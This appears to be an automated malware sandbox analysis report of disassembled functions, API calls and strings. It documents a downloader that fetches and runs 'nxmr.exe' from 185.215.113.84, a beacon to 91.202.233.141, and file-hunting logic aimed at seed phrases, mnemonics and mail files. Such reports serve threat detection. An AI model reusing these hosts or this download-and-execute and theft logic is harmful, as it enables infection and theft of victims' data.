                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00D91345
                                                                                                                    Strings
                                                                                                                    • %s:Zone.Identifier, xrefs: 00D9121C
                                                                                                                    • %s\%d%d.exe, xrefs: 00D912E9
                                                                                                                    • %s\%d%d.exe, xrefs: 00D9111F
                                                                                                                    • %s:Zone.Identifier, xrefs: 00D91329
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00D9113C
                                                                                                                    • %temp%, xrefs: 00D910E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2023893782.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.2023877709.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023919145.0000000000D94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_d90000_2736615137.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandlewsprintf$CacheEntryOpenSleep$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                    • API String ID: 3548267932-1161929716
                                                                                                                    • Opcode ID: 251f5e074e9d353e7e2b274070874e58e8073a4e2f0f913f23bde3b665489ec7
                                                                                                                    • Instruction ID: 5c603401596c3563e6bf4b25c80d810fcdc4b4d630d89134834368ac17c47362
                                                                                                                    • Opcode Fuzzy Hash: 251f5e074e9d353e7e2b274070874e58e8073a4e2f0f913f23bde3b665489ec7
                                                                                                                    • Instruction Fuzzy Hash: 3961A2B9940318ABDB24DB60DC4AFEA7379AB48701F044499F60DE21D0DA74AB84CFB4
                                                                                                                    Function 00D91000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60sleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 18 d91000-d91060 memset * 2 CreateProcessW 19 d91071-d91095 ShellExecuteW 18->19 20 d91062-d9106f Sleep 18->20 21 d91097-d910a4 Sleep 19->21 22 d910a6 19->22 23 d910a8-d910ab 20->23 21->23 22->23
                                                                                                                    APIs
                                                                                                                    • memset.MSVCR90 ref: 00D9100E
                                                                                                                    • memset.MSVCR90 ref: 00D9101E
                                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00D91057
                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 00D91067
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00D91082
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00D9109C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2023893782.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.2023877709.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023919145.0000000000D94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_d90000_2736615137.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                    • String ID: $D$open
                                                                                                                    • API String ID: 3787208655-2182757814
                                                                                                                    • Opcode ID: fc2a774977eac56ced033a2524aa046b98f980bbb0017fba25db99348dedaeb8
                                                                                                                    • Instruction ID: 23a5d2ae5cc6bc11d0047e64b43dec1ccb514091c34ed8dc36ab086a673f4323
                                                                                                                    • Opcode Fuzzy Hash: fc2a774977eac56ced033a2524aa046b98f980bbb0017fba25db99348dedaeb8
                                                                                                                    • Instruction Fuzzy Hash: F011F175E84308BBEB10DF90DD4BFAD7779AB58B01F200116FA09AE2C0D6B59A44CB75
                                                                                                                    Function 00D913C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D913DA
                                                                                                                    • wsprintfW.USER32 ref: 00D913F3
                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 00D91403
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00D91429
                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00D91445
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2023893782.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.2023877709.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023919145.0000000000D94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_d90000_2736615137.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                    • String ID: %s\roapalr.jpg$%temp%
                                                                                                                    • API String ID: 750032643-1357684243
                                                                                                                    • Opcode ID: 6d03673e265e0ce7ab981cbab75f29a1df4332a8d226979a87f9c03a20daebdf
                                                                                                                    • Instruction ID: 50c1dcbce7759e826747a9585b561918e81fdbe1384ca52c09554d5afff9155f
                                                                                                                    • Opcode Fuzzy Hash: 6d03673e265e0ce7ab981cbab75f29a1df4332a8d226979a87f9c03a20daebdf
                                                                                                                    • Instruction Fuzzy Hash: 78014FB4A40318BBDB20DB609C4AFF57378AB44704F0046A5BA19E61D1D6B05AC9DFB5
                                                                                                                    Function 00D91360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 30 d91360-d913ab ExpandEnvironmentStringsW wsprintfW PathFileExistsW 31 d913ad-d913af 30->31 32 d913b1 30->32 33 d913b3-d913b6 31->33 32->33
                                                                                                                    APIs
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 00D9137A
                                                                                                                    • wsprintfW.USER32 ref: 00D91393
                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 00D913A3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2023893782.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.2023877709.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023919145.0000000000D94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_d90000_2736615137.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentExistsExpandFilePathStringswsprintf
                                                                                                                    • String ID: %s\Program Files (x86)$%systemdrive%
                                                                                                                    • API String ID: 3337111443-1963301939
                                                                                                                    • Opcode ID: bf9c3f5d22e5e9c4f61f99a4781d05722f9ac0cb6a4f76ec8bf63770639523ae
                                                                                                                    • Instruction ID: ae25ebbb1d66837de337633f592f4a434f9431ad6dc84e9f7e0752a1a75380cb
                                                                                                                    • Opcode Fuzzy Hash: bf9c3f5d22e5e9c4f61f99a4781d05722f9ac0cb6a4f76ec8bf63770639523ae
                                                                                                                    • Instruction Fuzzy Hash: BEE065B554031D7BCF10DB60AC4AAF57338A701704F044695AA59D1151E6B096D8DBF5
                                                                                                                    Function 00D91460 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 18sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 34 d91460-d91478 Sleep call d91360 37 d9147a-d91484 call d913c0 34->37 38 d91493-d91496 34->38 37->38 41 d91486-d9148b call d910b0 37->41 43 d91490 41->43 43->38
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00D91468
                                                                                                                      • Part of subcall function 00D91360: ExpandEnvironmentStringsW.KERNEL32(%systemdrive%,?,00000104), ref: 00D9137A
                                                                                                                      • Part of subcall function 00D91360: wsprintfW.USER32 ref: 00D91393
                                                                                                                      • Part of subcall function 00D91360: PathFileExistsW.KERNELBASE(?), ref: 00D913A3
                                                                                                                      • Part of subcall function 00D913C0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D913DA
                                                                                                                      • Part of subcall function 00D913C0: wsprintfW.USER32 ref: 00D913F3
                                                                                                                      • Part of subcall function 00D913C0: PathFileExistsW.KERNELBASE(?), ref: 00D91403
                                                                                                                      • Part of subcall function 00D910B0: GetTickCount.KERNEL32 ref: 00D910B9
                                                                                                                      • Part of subcall function 00D910B0: srand.MSVCR90 ref: 00D910C0
                                                                                                                      • Part of subcall function 00D910B0: DeleteUrlCacheEntryW.WININET(?), ref: 00D910CC
                                                                                                                      • Part of subcall function 00D910B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D910EA
                                                                                                                      • Part of subcall function 00D910B0: rand.MSVCR90 ref: 00D910F0
                                                                                                                      • Part of subcall function 00D910B0: rand.MSVCR90 ref: 00D91104
                                                                                                                      • Part of subcall function 00D910B0: wsprintfW.USER32 ref: 00D9112B
                                                                                                                      • Part of subcall function 00D910B0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D91141
                                                                                                                      • Part of subcall function 00D910B0: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D9116D
                                                                                                                      • Part of subcall function 00D910B0: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D9119C
                                                                                                                      • Part of subcall function 00D910B0: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00D911CF
                                                                                                                      • Part of subcall function 00D910B0: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00D91200
                                                                                                                      • Part of subcall function 00D910B0: CloseHandle.KERNEL32(000000FF), ref: 00D9120F
                                                                                                                      • Part of subcall function 00D910B0: wsprintfW.USER32 ref: 00D91228
                                                                                                                    Strings
                                                                                                                    • http://185.215.113.84/nxmr.exe, xrefs: 00D91486
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2023893782.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000002.2023877709.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000002.2023919145.0000000000D94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_d90000_2736615137.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$wsprintf$EnvironmentExpandInternetStrings$ExistsOpenPathrand$CacheCloseCountCreateDeleteEntryHandleReadSleepTickWritesrand
                                                                                                                    • String ID: http://185.215.113.84/nxmr.exe
                                                                                                                    • API String ID: 4035879952-3066490085
                                                                                                                    • Opcode ID: fdb8565dfbee383624ef10ed3f5bf3d21084b51a6b2f67bc731a735edb9a0972
                                                                                                                    • Instruction ID: fbe46071caf5c1ae4900ae54b56b4bf9689c152761f996e82049c16f18b2f1e7
                                                                                                                    • Opcode Fuzzy Hash: fdb8565dfbee383624ef10ed3f5bf3d21084b51a6b2f67bc731a735edb9a0972
                                                                                                                    • Instruction Fuzzy Hash: D3D0C96DA4431B76AF1532B2BC0773F31B8AE15B92F484436F84AD8983ED45D41994B2

                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 00571080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0057109A
                                                                                                                    • wsprintfW.USER32 ref: 005710B3
                                                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 005710C3
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 005710E9
                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00571105
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1994788800.0000000000571000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00570000, based on PE: true
                                                                                                                    • Associated: 0000000E.00000002.1994772481.0000000000570000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994803487.0000000000572000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994816897.0000000000573000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994830996.0000000000580000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994843905.0000000000581000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_570000_204078699.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                    • String ID: %s\feeea3sdfasgsa.txt$%temp%
                                                                                                                    • API String ID: 750032643-19136982
                                                                                                                    • Opcode ID: 5d631d6642cf43ac54e963903985353421fda968ccc9df7d2d0d6fb5ae6d709b
                                                                                                                    • Instruction ID: 863e843674fc0560d3d951622adbeb4f13fba9069977ad728dcdd2fc3183a6b6
                                                                                                                    • Opcode Fuzzy Hash: 5d631d6642cf43ac54e963903985353421fda968ccc9df7d2d0d6fb5ae6d709b
                                                                                                                    • Instruction Fuzzy Hash: 050184B4940318ABD720DB60BC4EFE57778AB54701F008594A71D960D2D670AAC8EFB5
                                                                                                                    Function 00571000 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 36networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • wsprintfW.USER32 ref: 00571015
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0057102B
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00571056
                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00571063
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00571070
                                                                                                                    Strings
                                                                                                                    • http://91.202.233.141/IBSTSWSONL, xrefs: 00571009
                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00571026
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1994788800.0000000000571000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00570000, based on PE: true
                                                                                                                    • Associated: 0000000E.00000002.1994772481.0000000000570000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994803487.0000000000572000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994816897.0000000000573000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994830996.0000000000580000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994843905.0000000000581000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_570000_204078699.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpen$wsprintf
                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://91.202.233.141/IBSTSWSONL
                                                                                                                    • API String ID: 1691607147-3072516501
                                                                                                                    • Opcode ID: 5455c4650cbe8630d9c705df5683cc5d13c7783d07bc64119bb9570f50b6a65b
                                                                                                                    • Instruction ID: fd483d4c920f4f7348a3939153106f8a2182023e3f2f494e9b954d3d7997d5d5
                                                                                                                    • Opcode Fuzzy Hash: 5455c4650cbe8630d9c705df5683cc5d13c7783d07bc64119bb9570f50b6a65b
                                                                                                                    • Instruction Fuzzy Hash: 2201E174E80216ABD7259F64ED0EFA977BDFB14701F1040A8B60DA61C0D6706B84EA79
                                                                                                                    Function 00571120 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 9 571120-571138 Sleep call 571080 12 57113f-571142 9->12 13 57113a call 571000 9->13 13->12
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00571128
                                                                                                                      • Part of subcall function 00571080: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0057109A
                                                                                                                      • Part of subcall function 00571080: wsprintfW.USER32 ref: 005710B3
                                                                                                                      • Part of subcall function 00571080: PathFileExistsW.KERNELBASE(?), ref: 005710C3
                                                                                                                      • Part of subcall function 00571000: wsprintfW.USER32 ref: 00571015
                                                                                                                      • Part of subcall function 00571000: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0057102B
                                                                                                                      • Part of subcall function 00571000: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00571056
                                                                                                                      • Part of subcall function 00571000: InternetCloseHandle.WININET(?), ref: 00571063
                                                                                                                      • Part of subcall function 00571000: InternetCloseHandle.WININET(00000000), ref: 00571070
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000E.00000002.1994788800.0000000000571000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00570000, based on PE: true
                                                                                                                    • Associated: 0000000E.00000002.1994772481.0000000000570000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994803487.0000000000572000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994816897.0000000000573000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994830996.0000000000580000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 0000000E.00000002.1994843905.0000000000581000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_14_2_570000_204078699.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseHandleOpenwsprintf$EnvironmentExistsExpandFilePathSleepStrings
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2566316890-0
                                                                                                                    • Opcode ID: a3bae21f4a325b6575dd23ad4fbd46e9e499d2550ffc93da968c4b992bd8b904
                                                                                                                    • Instruction ID: df15ea3f2982e9dcb5cc7b5cedaf819e1d16142f0bee5f5a321425ee0fd8164d
                                                                                                                    • Opcode Fuzzy Hash: a3bae21f4a325b6575dd23ad4fbd46e9e499d2550ffc93da968c4b992bd8b904
                                                                                                                    • Instruction Fuzzy Hash: 70C08C3010864A13930032BA7C0E72A39887B40391F40C022F18CC80C6ED41D440B0BA

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF684C814B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2171897069.00007FF684C81000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF684C80000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2171802972.00007FF684C80000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2173192676.00007FF684C9B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2173372994.00007FF684C9C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2175436887.00007FF685207000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2175469340.00007FF685209000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2175531991.00007FF685212000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2175559321.00007FF685215000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2175606844.00007FF685216000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff684c80000_1088610392.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                    • Instruction ID: d07ad4c56cfa1df152e499ff2de52d07412451b910dcd50477a14c1eb57c6004
                                                                                                                    • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                    • Instruction Fuzzy Hash: E5B0127491D209D4E3002F11DC912D87670BF08F40F404036C40C53353CE7C5444C710

                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 00AF1A20 Relevance: 71.9, APIs: 23, Strings: 18, Instructions: 186filestringCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.MSVCR90 ref: 00AF1A65
                                                                                                                    • memset.MSVCR90 ref: 00AF1A7B
                                                                                                                    • PathCombineW.SHLWAPI(?,$recycle.bin,00AFA260), ref: 00AF1A93
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00AF1AA7
                                                                                                                    • lstrcmpW.KERNEL32(?,00AFA264), ref: 00AF1AD7
                                                                                                                    • lstrcmpW.KERNEL32(?,00AFA268), ref: 00AF1AED
                                                                                                                    • PathCombineW.SHLWAPI(?,$recycle.bin,?), ref: 00AF1B09
                                                                                                                    • CharLowerW.USER32(?), ref: 00AF1B36
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.txt), ref: 00AF1B9F
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.rtf), ref: 00AF1BB9
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.csv), ref: 00AF1BD3
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.md), ref: 00AF1BED
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.mnemonic), ref: 00AF1C07
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.json), ref: 00AF1C21
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.pdf), ref: 00AF1C3B
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.seed), ref: 00AF1C51
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.eml), ref: 00AF1C67
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.msg), ref: 00AF1C7D
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.log), ref: 00AF1C93
                                                                                                                    • PathMatchSpecW.SHLWAPI(?,*.mbox), ref: 00AF1CA9
                                                                                                                    • PathCombineW.SHLWAPI(?,$recycle.bin,?), ref: 00AF1CC5
                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,?), ref: 00AF1CE8
                                                                                                                    • CloseHandle.KERNELBASE(000000FF), ref: 00AF1CFD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$MatchSpec$Combine$FileFindlstrcmpmemset$CharCloseFirstHandleLowerNext
                                                                                                                    • String ID: $recycle.bin$*.csv$*.eml$*.json$*.log$*.mbox$*.md$*.mnemonic$*.msg$*.pdf$*.rtf$*.seed$*.txt$boot$intel$msocache$perflogs$windows
                                                                                                                    • API String ID: 3613755899-1061123184
                                                                                                                    • Opcode ID: 3ad0689dbff0084b5b761f8f5052f85aed8ecc050cb09a315985636275f0fc62
                                                                                                                    • Instruction ID: 006fe9db39516168c7035c86b042282f224bd37f58694d1ca6104b46984e1ec2
                                                                                                                    • Opcode Fuzzy Hash: 3ad0689dbff0084b5b761f8f5052f85aed8ecc050cb09a315985636275f0fc62
                                                                                                                    • Instruction Fuzzy Hash: 76713EB2A0021CABCF20DBE1DE48AF97778AB54705F004A98F709A6151EB35DB89CF54
                                                                                                                    Function 00AF1F40 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 32sleepsynchronizationthreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00AF1F49
                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,gggghhhfccc7), ref: 00AF1F58
                                                                                                                    • GetLastError.KERNEL32 ref: 00AF1F61
                                                                                                                    • ExitProcess.KERNEL32 ref: 00AF1F70
                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00001ED0,00000000,00000000,00000000), ref: 00AF1F91
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00AF1F9C
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00AF1FAC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.4115272973.0000000000AF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.4115209431.0000000000AF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115377960.0000000000AFB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.4115462264.0000000000AFE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_af0000_191563587.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep$Create$ErrorExitLastMutexProcessThread
                                                                                                                    • String ID: gggghhhfccc7
                                                                                                                    • API String ID: 302559243-2300851614
                                                                                                                    • Opcode ID: 84764040f39c2aa5a1193f80212dcbe0f721b48878be93d25c21b3247bee1032
                                                                                                                    • Instruction ID: 6270a9b7094a57646b7af1d52a887a0f5918a530ff5a3610119017413eedad18
                                                                                                                    • Opcode Fuzzy Hash: 84764040f39c2aa5a1193f80212dcbe0f721b48878be93d25c21b3247bee1032
